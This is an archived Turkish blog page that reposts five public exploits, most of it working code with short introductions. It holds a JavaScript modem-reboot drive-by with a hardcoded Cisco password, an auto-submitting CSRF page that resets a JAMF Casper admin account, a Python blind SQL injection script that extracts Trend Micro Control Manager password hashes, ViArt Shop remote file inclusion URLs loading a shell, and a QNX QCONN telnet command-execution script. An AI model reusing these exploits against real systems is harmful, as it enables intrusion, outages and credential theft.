Archive for 27 Eylül 2012

admin | 27 Eylül 2012
No comments

Cisco DPC2100 Denial of Service

Cisco DPC2100 Denial of Service açığı, javascript sayesinde modeme restart attırabilmekte ve portlara saldırı düzenlenebilmekte.

# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613

=======================================================
 Information
=======================================================
Executing this script on page load will cause the users modem to restart when 
they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of
two parts.

Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

=======================================================
 Proof of Concept (Javascript)
=======================================================
(function() {
  var b=document.getElementsByTagName('body')[0];
  var otherlib=false;
 
  if(typeof jQuery!='undefined') {
    console.log('This page already using jQuery v'+jQuery.fn.jquery);
  } else if (typeof $=='function') {
    otherlib=true;
  }
  function getScript(url,success){
    var script=document.createElement('script');
    script.src=url;
    var head=document.getElementsByTagName('head')[0],
        done=false;
    // Attach handlers for all browsers
    script.onload=script.onreadystatechange = function(){
      if ( !done && (!this.readyState
           || this.readyState == 'loaded'
           || this.readyState == 'complete') ) {
        done=true;
        success();
        script.onload = script.onreadystatechange = null;
        head.removeChild(script);
      }
    };
    head.appendChild(script);
  }
  getScript('http://code.jquery.com/jquery-latest.min.js',function() {
    if (typeof jQuery=='undefined') {
      console.log('Sorry, but jQuery wasn\'t able to load');
    } else {
          console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
        $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
          console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
        $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
          console.log('Reboot command sent.');
    }
  });
})();
Category: Genel | Tags: , ,
admin | 27 Eylül 2012
No comments

JAMF Casper Suite MDM CSRF Vulnerability

JAMF Casper Suite MDM CSRF csrf açığı bulunmuş olup açığa ilişkin code aşağıdadır.

CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability

# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 


<head>
<title>Download</title>
</head>

<body>

<form name="csrf" 
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
</form>

<script>
document.csrf.submit();
</script>

</body>
</html>


If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.
Category: Genel | Tags: ,
admin | 27 Eylül 2012
No comments

Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection

Trend Micro Control Manager 5.5/6.0 AdHocQuery versiyonunda Blind Sql injection açığı bulundu.
Açığa ilişkin python exploit aşağıda olup, tablolaları erişim imkanı sağlıyor. AdHocQuery_Processor.aspx yazılımında bulunan hata sayesinde username ve password bilgileri alınabiliyor.

#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy  & modpr0be ()
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and 
# policy violations, and automates routine tasks. New features include a customizable dashboard 
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network, 
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the 
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds, 
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some 
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|    Trend Micro Control Manager BlindSQLi Password Extractor   |
|                         CVE-2012-2998                         |
|          by otoy & modpr0be (research[at]spentera.com)    |
|                                                               |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
        return ord(hex(item).replace('0x',''))

def konek(m,n):
        #borrow from SQLmap :)
        query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
               " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

        values = { 'Action': 'View',             
                   'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
                   'asc': 'true',
                   'Sort': 7,
                   'paging': 10 }
 
        url = "%s?%s" % (target, urllib.urlencode(values)) 
        req = urllib2.Request(url)                         
        req.add_header('Cookie', cookie)                  
        try:                                        
                starttime=time.time()
                response = urllib2.urlopen(req)     
                endtime = time.time()
                return int(endtime-starttime)
        except:                                             
                print '\n[-] Uh oh! Exploit fail..'                
                sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
        for n in range(0,16):
                wkttunggu = konek(m,Hex2Des(n)) 
                if (wkttunggu < delay):                              
                        sys.stdout.write(chr(Hex2Des(n)))
                        sys.stdout.flush()
                        break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)
Category: Genel | Tags: , , ,
admin | 27 Eylül 2012
No comments

ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability

ViArt Shop Evaluation v4.1 versiyonunda remote file inclusion açığı bulundu. Açık sayesinde, açıklı url ye uzaktaki shell eklenerek sunucuya ulaşmak ve hertürlü dosya upload etmek, exploit çalıştırmak mümkün. Her ne kadar remote file include açıkları çok çok azalsa da halen daha bazı eski scriptlerde görmek mümkün.
Ancak şu durumda var scriptte file include açığı olsa bile, hostinglerin çok büyük çoğunluğunda önlemler alınmış durumda.

############################################
### Exploit Title: ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability
### Date: 26/9/2012 
### Author: L0n3ly-H34rT 
### Contact:  
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.viart.com/
### Software Link: http://www.viart.com/downloads/viart_shop-4.1.zip
### Version: 4.1
### Tested on: Linux/Windows 
############################################

# Affected files :

1- ( /admin/admin_header.php ) on line 13 :

include_once($root_folder_path . "messages/" . $language_code . "/cart_messages.php");

2- ( /includes/ajax_list_tree.php ) on line 29 :

include_once($root_folder_path . "includes/navigator.php");

3- ( /includes/previews_functions.php ) on line 13 :

include_once($root_folder_path . "includes/sql_functions.php");

# P.O.C :

http://127.0.0.1/viart_shop-4.1/admin/admin_header.php?root_folder_path=http://127.0.0.1/shell.txt?

http://127.0.0.1/viart_shop-4.1/includes/ajax_list_tree.php?root_folder_path=http://127.0.0.1/shell.txt?

http://127.0.0.1/viart_shop-4.1/includes/previews_functions.php?root_folder_path=http://127.0.0.1/shell.txt?

############################################

# Greetz to my friendz
Category: Genel | Tags: , , ,
admin | 26 Eylül 2012
No comments

QNX QCONN Remote Command Execution Vurnerability

QNX QCONN Uzaktan bağlanma ve komut çalıştarma açığı
Aşağıdaki python exploitle QCONNRC.py 192.168.0.1 8000 şeklinde kullanılarak uzaktan servere erişim mümkün.

# Title : QNX QCONN Remote Command Execution Vurnerability
# Version : QNX 6.5.0 >= , QCONN >= 1.4.207944
# Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)
# Vendor : http://www.qnx.com
# Date : 2012/09/09
# CVE : N/A
# Exploit Author : Mor!p3r(moriper[at]gmail.com)

import telnetlib
import sys

if len(sys.argv) < 3:
  print " "
  print " -----------------------------------------------------"
  print " + Qconn Remote Command Execution PoC (Shutdown) +"
  print " -----------------------------------------------------"
  print " "
  print " + Usage: QCONNRC.py <Target IP> <Port>"
  print "    + Ex> QCONNRC.py 192.168.0.1 8000"
  print ""
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print "[+] Finish"
telnet.close()
Category: Genel | Tags: ,
« Older Entries   Recent Entries »